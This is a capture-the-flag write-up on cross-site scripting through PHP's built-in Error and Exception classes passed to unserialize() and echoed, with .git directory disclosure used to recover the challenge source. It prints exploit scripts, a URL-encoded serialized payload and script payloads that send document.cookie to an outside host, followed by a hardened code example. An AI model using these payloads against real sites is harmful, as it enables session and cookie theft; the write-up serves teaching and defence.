Topics tested: XSS through PHP built-in (native) classes; .git directory disclosure
Knowledge points
__toString()
Called automatically when an object is used as a string, for example:
$aaa = new class(); echo $aaa; (where class is some class)
It is not limited to echo, though: a check such as file_exists($aaa) also triggers it.
Error
Environment: PHP 7
Error is a PHP built-in class. It has a __toString() method whose output contains the unescaped message, so echoing an unserialized Error object produces an XSS.
Test it:
1.php:
<?php
$a = unserialize($_GET['c']);
echo $a;
?>
Exploit script (exp):
<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>
The exp outputs:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A19%3A%22%2Fvar%2Fwww%2Fhtml%2F1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
Pass it as the parameter to 1.php:
?c=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A19%3A%22%2Fvar%2Fwww%2Fhtml%2F1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
alert(1) fires successfully.
Exception
Environment: PHP 5 and 7
Used in the same way as Error; just replace Error with Exception in the exp.
Solving the challenge
First open the challenge container; it looks like this:
There is a .git directory disclosure. Use the GitHack tool (under Python 2.7) to recover the source code.
The recovered source, index.php:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
From this we only learn the parameter name, not any application class to target, so the knowledge above comes in: pick a PHP built-in class instead. The challenge environment is PHP 5, so Exception is used.
- window.open is the JavaScript method for opening a new window
- window.location.href='url' performs a (malicious) redirect
- alert(document.cookie) pops up the cookie, but does not work in this challenge
<?php
$a = new Exception("<script>window.open('http://7f34285c-b9d4-4034-9baa-8c7581cdbb2b.node3.buuoj.cn/?'+document.cookie);</script>");
$b = serialize($a);
echo urlencode($b);
$a = new Exception("<script>window.location.href='http://7f34285c-b9d4-4034-9baa-8c7581cdbb2b.node3.buuoj.cn'+document.cookie</script>");
$b = serialize($a);
echo urlencode($b);
$a = new Exception("<script>alert(document.cookie)</script>");
$b = serialize($a);
echo urlencode($b);
?>
This gives the results.
Then pass the parameter; the flag is in the cookie.
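For contrast, a hardened version of index.php, written as an added example (not the challenge's code): it refuses to let serialized input instantiate any class, so an O:5:"Error" or O:9:"Exception" payload can no longer bring a live __toString() with it, and it HTML-escapes whatever it does print. The function name render_untrusted and the sample inputs are assumptions.

```php
<?php
// Hardened variant of the challenge's index.php (added example, not the original).
// Mitigation 1: unserialize() with allowed_classes => false turns every object
// in the payload into __PHP_Incomplete_Class, so no Error/Exception __toString()
// (which embeds the attacker-controlled message unescaped) is ever invoked.
// Mitigation 2: only scalars are echoed, and they are HTML-escaped first.
function render_untrusted(string $payload): string
{
    $value = @unserialize($payload, ['allowed_classes' => false]);
    // unserialize() returns false both on failure and for a serialized false;
    // distinguish the two so garbage input is rejected explicitly.
    if ($value === false && $payload !== serialize(false)) {
        return 'invalid input';
    }
    // Anything non-scalar (arrays, __PHP_Incomplete_Class) is refused rather
    // than being implicitly converted to a string.
    if (!is_scalar($value)) {
        return 'unsupported type: ' . gettype($value);
    }
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: the write-up's XSS payload and a benign string.
$xss    = serialize(new Exception("<script>alert(1)</script>"));
$benign = serialize("<b>hi</b>");

echo render_untrusted($xss), "\n";    // unsupported type: object
echo render_untrusted($benign), "\n"; // &lt;b&gt;hi&lt;/b&gt;
```

The same payload that gave alert(1) against the original code now produces only the literal text "unsupported type: object", and even a plain string is rendered as escaped markup rather than live HTML.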